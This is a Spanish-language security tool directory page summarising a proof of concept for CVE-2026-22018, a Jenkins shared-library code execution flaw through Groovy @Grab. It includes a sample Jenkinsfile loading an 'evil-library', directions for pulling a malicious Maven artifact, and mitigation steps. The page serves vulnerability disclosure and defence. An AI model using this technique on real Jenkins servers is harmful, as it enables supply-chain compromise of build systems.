Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-22018-Jenkins-Pipeline-Shared-Library-Code-Execution-via-Grab- — PoC para CVE-2026-22018, un fallo crítico de RCE en Jenkins Pipeline Shared Library mediante Groovy @Grab, que demuestra la inyección de código en la cadena de suministro y los pasos de mitigación. | Kitploit
Herramientas/GitHubGitHub/george0papasotiriou/cve-2026-22018-jenkins-pipeline-shared-library-code-execution-via-grab-
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebDevSecOpsSeguridad de Cadena de Suministro
GitHubgeorge0papasotiriou/cve-2026-22018-jenkins-pipeline-shared-library-code-execution-via-grab-

CVE-2026-22018-Jenkins-Pipeline-Shared-Library-Code-Execution-via-Grab-

PoC para CVE-2026-22018, un fallo crítico de RCE en Jenkins Pipeline Shared Library mediante Groovy @Grab, que demuestra la inyección de código en la cadena de suministro y los pasos de mitigación.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 16 díasAún no revisado

CVE-2026-22018 – Ejecución de código en la biblioteca compartida de Jenkins Pipeline mediante @Grab

Código del programa (pipeline de Groovy)

root@kitploit:~
// Jenkinsfile - loads untrusted shared library
@Library('evil-library@master') _
node {
    evilStep()
}

CVE-2026-22018 – Ejecución remota de código en la biblioteca compartida de Jenkins Pipeline

Severity: Critical

Descripción general

Un pipeline de Jenkins carga una biblioteca compartida desde una fuente no totalmente confiable. La biblioteca utiliza la anotación @Grab para descargar artefactos Maven externos, que pueden incluir una clase maliciosa que ejecuta código en el controlador de Jenkins durante la compilación de Groovy.

Detalles de la vulnerabilidad

  • Tipo: Inyección de código / Cadena de suministro
  • Impacto: Compromiso total del controlador de Jenkins.
  • Causa raíz: La anotación @Grab de Groovy descarga y carga JAR arbitrarios en tiempo de ejecución; las bibliotecas compartidas no están en un entorno aislado (sandbox).

Demostración del exploit

Configure un pipeline con una biblioteca no confiable que contenga @Grab('com.evil:malware:1.0') en su vars/evilStep.groovy. Cuando el pipeline se ejecuta, se ejecuta el inicializador estático del JAR malicioso.

Mitigación

  • Utilice únicamente bibliotecas compartidas de repositorios SCM firmados y de confianza.
  • Deshabilite @Grab mediante la configuración de seguridad del sandbox de Groovy.
  • Utilice con cuidado la opción de pipeline «Load implicitly».

Instalación y uso

root@kitploit:~
git clone https://github.com/yourorg/CVE-2026-22018.git
cd CVE-2026-22018
# Set up Jenkins in a lab environment to test.
Descargar herramienta